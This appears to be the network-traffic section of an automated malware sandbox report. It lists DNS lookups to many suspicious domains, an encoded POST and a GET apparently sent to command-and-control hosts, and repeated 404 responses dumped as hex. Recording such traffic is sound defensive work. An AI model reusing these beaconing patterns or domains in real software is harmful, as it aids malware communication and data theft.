                Source: global trafficHTTP traffic detected: GET /912o/?GhEtuH=70ci5pGKsfR7ryWTKFtFiUt7/TqIPHf64KC8vmTT6Dtcu2BtDGHTaTjOoGUC2iu8k3BJ4N7Du7dNBD6fJpU48FM3duIc/ctQLZHS0QyH+uuzGzjKGZHdmjrbFNuBsSBruIhtULDLHkLM&9hy=gvrDS8U8OP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.soainsaat.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficDNS traffic detected: DNS query: www.aextligrwjv.best
                Source: global trafficDNS traffic detected: DNS query: www.duwixushx.xyz
                Source: global trafficDNS traffic detected: DNS query: www.vayui.top
                Source: global trafficDNS traffic detected: DNS query: www.remedies.pro
                Source: global trafficDNS traffic detected: DNS query: www.327531.buzz
                Source: global trafficDNS traffic detected: DNS query: www.everythlngict.org
                Source: global trafficDNS traffic detected: DNS query: www.3kw40881107247y.click
                Source: global trafficDNS traffic detected: DNS query: www.futurorks.xyz
                Source: global trafficDNS traffic detected: DNS query: www.hwbzfdtn.tokyo
                Source: global trafficDNS traffic detected: DNS query: www.129glenforest.com
                Source: global trafficDNS traffic detected: DNS query: www.dating-ml-es.xyz
                Source: global trafficDNS traffic detected: DNS query: www.soainsaat.xyz
                Source: global trafficDNS traffic detected: DNS query: www.nicolemichelle.net
                Source: unknownHTTP traffic detected: POST /fyc8/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.5Host: www.duwixushx.xyzOrigin: http://www.duwixushx.xyzContent-Length: 219Cache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedReferer: http://www.duwixushx.xyz/fyc8/User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30Data Raw: 47 68 45 74 75 48 3d 77 6f 47 45 34 34 4b 56 65 31 7a 7a 32 73 4a 73 4a 44 79 31 52 57 67 78 4d 66 6f 31 70 35 6b 50 6a 4a 68 49 59 56 7a 76 4d 38 53 34 75 64 4d 77 6f 58 59 72 76 37 2b 4d 75 54 61 36 6d 68 6d 4e 49 72 52 39 65 58 50 2b 34 70 45 70 6d 69 70 30 6b 64 6a 44 6c 4f 5a 55 6a 77 51 6c 6b 54 32 4b 44 42 6f 6b 47 58 4a 39 4a 45 69 42 56 4a 2b 39 54 55 44 59 4d 49 49 62 34 2f 51 6d 4d 38 75 50 41 61 65 53 7a 45 67 53 44 65 78 2b 6f 6b 71 79 68 31 75 68 4a 6b 4e 52 58 49 36 41 58 6e 5a 53 35 4c 36 42 43 6d 55 6c 4d 54 77 6e 53 65 61 78 66 49 45 6d 70 6a 76 35 2f 49 6b 6d 6c 76 41 6b 65 5a 67 4e 69 52 7a 56 51 7a 39 5a 4a 38 33 50 67 77 3d 3d Data Ascii: GhEtuH=woGE44KVe1zz2sJsJDy1RWgxMfo1p5kPjJhIYVzvM8S4udMwoXYrv7+MuTa6mhmNIrR9eXP+4pEpmip0kdjDlOZUjwQlkT2KDBokGXJ9JEiBVJ+9TUDYMIIb4/QmM8uPAaeSzEgSDex+okqyh1uhJkNRXI6AXnZS5L6BCmUlMTwnSeaxfIEmpjv5/IkmlvAkeZgNiRzVQz9ZJ83Pgw==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 14:31:24 GMTContent-Type: text/plain; charset=utf-8Content-Length: 19Connection: closeX-Content-Type-Options: nosniffCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H9J%2Boy8JtxLUib5LByq8EBXSF4xiTD1UQfqkgnzkcB%2FBEo0n0CPB8pX7ZjQUXNlN7dBlXS4wVS5hCdzyZPP8IOxGV%2Bvf%2BvzcIBs10Pw0ppc7fIwMxVqyQk%2Fl3LZYvCGadCR6Ij6%2BQw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ecc7ff79bde42e4-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=13055&min_rtt=13055&rtt_var=6527&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=494&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 04 Dec 2024 14:31:41 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 04 Dec 2024 14:31:49 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 14:31:56 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L5K3JaNCNdMZuzO%2FzysS2IExwivlQI3M2Q7OC4QPCUv%2BPSQlrTn6HpiuoNVXdb6Iyv2mg7f9%2FzVDvdu%2Fb48Dg%2Ff640TWSRQ78OM170OHvAihMEcbIBgvzJ93aRAjFBfK"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ecc80c07ea0431a-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1705&rtt_var=852&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=738&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 14:31:59 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VziJ2wwLAzfONIBWpdVJNOSz6p%2FRpPbEpeG0HHnLhHVZqJxGPqvNjMFVSCaF%2Fw6H28ggUgyrUfLRsdWK39X2TpQN6CxdlI8B4ykZHbu4dOcH%2FmSqE0uaKW7F4OsHmjBw"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ecc80d10dc17c69-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1993&min_rtt=1993&rtt_var=996&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=758&delivery_rate=0&cwnd=169&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 14:32:01 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c7Vsc7NGA4n8k32ZoAsbwPevv50no6lWQvkG155Heu4pSJ8GF3T%2FfsAKxyLNzhA37lho8OAcXmqKqNl9uYCISyB6EoaE9HvWHsnZBcYHR3x6qXbhrTqO%2BQJeYli%2B5BOL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ecc80e1abfc4295-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=13333&min_rtt=13333&rtt_var=6666&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1771&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 14:32:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aXv0XkDv6GV8NH9ejLZbzSOne8aUNPi%2BrB3rpa5pcQNGtoc3cWQB%2FHM%2FxP09zwtL%2F%2F61P3H4F4NAe3cxnNAHZxaU%2F9vS9g2wz6BjJtlcLxQ3txTHWlYRUKOMNJDgOXBL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ecc80f33b267285-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=13486&min_rtt=13486&rtt_var=6743&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=487&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 14:33:17 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=obGPbf5%2FgCZU2EXKF3T85S0EPaeGffiv0vGQObzmDsjtyx%2BWefqSOr%2FJTCo6WRhW7fA6qk62gOk5aH3GIXqpCnCLUNxOhULfG5I2nRrnGZyyoSn0Or0ZuLoNebI9znNqjrap30K%2FVWn4Akbw"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ecc82ba2ae74382-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=15135&min_rtt=15135&rtt_var=7567&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=774&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 14:33:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U38n6HSzl%2B1frqxmeiaxLCRCq8mwJ4UmeYPgrtmXUuk%2BootiumRM2XGx9aYD%2FyywcT1mXotLo%2Ba74nBovt%2BhkTwcvAL5yOC5BCgKCojzl9aFhTJVG%2FlULfaoaM7cakjUTq7HfA1sEIL0tCiu"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ecc82cb4b007c7c-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2127&min_rtt=2127&rtt_var=1063&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=794&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 14:33:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K0EewMiMVQtNSCgy83Qg%2BUQhRNaGDrPSoEYTBWG98HIk8%2FnLYcz8F2TX13Juf0EH%2FwfyQok70AT%2BqrWwyWMOveqm0Tv9gI6OZGmE1jQntXPfw74rY6dbkv64A9JAet8P3STydcOIv%2B0G7Zxv"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ecc82dd0c593308-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1880&min_rtt=1880&rtt_var=940&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1807&delivery_rate=0&cwnd=103&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 14:33:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E1QepsJyypTd6SyQGDFv4Te9O2Bci67NIyJg1MZQhR8KcrN4ChTyHTIm0cwg1mVKqOR1hOS%2FicDonJafgnttYk38GVK221eEpgEiU5TNEK0QZfCeLRD6lt99o5AvTd4ZN9ONW%2Fazn%2FRC%2FBWR"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ecc82ee79e5436d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=23537&min_rtt=23537&rtt_var=11768&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=499&delivery_rate=0&cwnd=157&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 14:33:32 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 14:33:35 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 14:33:37 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 